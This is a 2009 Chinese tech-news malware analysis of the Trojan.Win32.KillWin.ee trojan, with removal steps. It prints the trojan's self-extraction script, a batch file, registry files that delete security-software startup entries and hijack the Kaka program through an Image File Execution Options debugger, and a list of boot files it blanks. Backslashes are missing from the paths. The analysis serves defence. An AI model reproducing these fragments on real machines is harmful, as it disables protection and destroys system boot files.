分析清除Trojan.Win32.KillWin.ee木马

ZDNet软件频道 时间:2009-11-05 作者:往事如风 | IT168 我要评论()
本文关键词:木马清除 木马 Windows
病毒名为Trojan.Win32.KillWin.ee,文件虽然只有小小的169 KB(173,614 字节),但其威力却不容小视。下面将详细为用户介绍Trojan.Win32.KillWin.ee。

  病毒日新月异的今天,越来越多的伪装及新型变种是一天接一天的疯狂,面对如此情况,很多网民是只能一次又一次的进行系统还原或者是重装系统。而安全软件在此时却显得力不从心,因为很多病毒木马在发作前都开始解除安软的保护功能,这不新出现的Trojan.Win32.KillWin.ee也具备此种功能。

  病毒分析

  该病毒名为Trojan.Win32.KillWin.ee,文件虽然只有小小的169 KB(173,614 字节),但其威力却不容小视。病毒为WINRAR自解压缩包格式,可通过修改自身图标为卡卡助手的标识来进行伪装自身。当病毒进驻到用户计算机后,会释放BAT和REG命令的执行文件,并利用命令方式删除用户计算机中的卡卡助手启动项,禁止其真实的程序启动,然后通过劫持卡卡的主程序并将其指向病毒主体gameover.exe程序。

  该程序在使用自动解压缩命令解压自身后开始进行系统破坏,其自解压命令如下:

  Path=%SystemRoot%system32

  SavePath

  Setup=hidecmd.exe kv.bat

  Silent=1

  Overwrite=1

  执行hidecmd.exe(隐藏执行BAT)用参数调用kv.bat隐藏执行。

  kv.bat的内容为:

  @echo off

  %SystemRoot% egedit /s kaka.reg

  %SystemRoot% egedit /s gameover.reg

  Exit

  病毒修改注册表

  在结束上述命令后,病毒源体开始接着导入到系统中两个REG文件,来修改注册表,其内容如下:

  kaka.reg:

  Windows Registry Editor Version 5.00

  [-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnce]

  "KKDelay"="C:Program FilesRisingAntiSpywareRunOnce.exe"

  [-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]

  "runeip"=""C:Program FilesRisingAntiSpywareruniep.exe" /startup"

  [-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOptionalComponents]

  [-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOptionalComponentsIMAIL]

  "Installed"="1"

  [-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOptionalComponentsMAPI]

  "Installed"="1"

  "NoChange"="1"

  [-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOptionalComponentsMSFS]

  "Installed"="1"

  病毒删除卡卡助手

  到此时病毒依然没有停手,其开始查找并删除卡卡助手的相关启动,其内容如下:

  gameover.reg:

  Windows Registry Editor Version 5.00

  [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsRas.exe]

  "Debugger"="C:winntsystem32gameover.exe"

  从而进行劫持卡卡主程序并将其指向释放的病毒。

  小提示:从这里%SystemRoot%system32可以看出作者针对的是WIN2K系列,因为刚才的WINRAR释放脚本使用的是环境变量,只有在WIN2K系列操作平台中才是WINNT文件夹,而在XP里是Windowssystem32,所以这个劫持指向无效。

  重要注释

  %System32%是一个可变路径,病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:WinntSystem32,Windows95/98/me中默认的安装路径是C:WindowsSystem,WindowsXP中默认的安装路径是C:WindowsSystem32。

  %Temp% = C:Documents and SettingsAAAAALocal SettingsTemp 当前用户TEMP缓存变量

  %Windir% WINDODWS所在目录

  %DriveLetter% 逻辑驱动器根目录

  %ProgramFiles% 系统程序默认安装目录

  %HomeDrive% = C: 当前启动的系统的所在分区

  %Documents and Settings% 当前用户文档根目录

  破坏系统的gameover.exe

  病毒在对卡卡劫持后,开始进行下一步活动,在系统中放入gameover.exe程序进行系统破坏。其实gameover.exe也是一个自解压缩包,内含自解压脚本命令如下:

  Path=C:

  SavePath

  Silent=1

  Overwrite=1

  释放了0字节的同名空文件替换以下系统文件,破坏系统启动:

  AUTOEXEC.BAT

  boot.ini

  bootfont.bin

  CONFIG.SYS

  IO.SYS

  MSDOS.SYS

  NTDETECT.COM

  Ntldr

  清除病毒

  普通用户可通过系统镜像还原实现系统恢复,而对于有一定基础的网民来说,可以系统光盘中复制上述的系统文件进行修复操作系统平台。在查找文件时可以用DIR命令来查找其相关位置,如:首先进入光盘的盘符,然后输入:DIR Autoexe.bat,系统会将此路径下的Autoexe.bat文件的位置显示出来,然后再进行复制文件,其命令格式如下:

  COPY_源路径_目标路径(其中_为空格),比如:“COPY_X:autoexe.bat_C:”就表示将X盘根目录下的Autoexe.bat文件拷贝到C盘根目录下。

  然后删除系统目录%SystemRoot%system32下的gameover.exe文件即可,最后进行杀毒软件的升级与全盘杀毒,以防另类感染。

  编者按:病毒虽然有其入驻破坏之道,但只要掌握其原理,在了解其运行过程与所添加的注册表项目后,即可轻而易举的将其清除出系统之外,还平台一个安全的环境。


百度大联盟认证黄金会员Copyright© 1997- CNET Networks 版权所有。 ZDNet 是CNET Networks公司注册服务商标。
中华人民共和国电信与信息服务业务经营许可证编号:京ICP证010391号 京ICP备09041801号-159
京公网安备:1101082134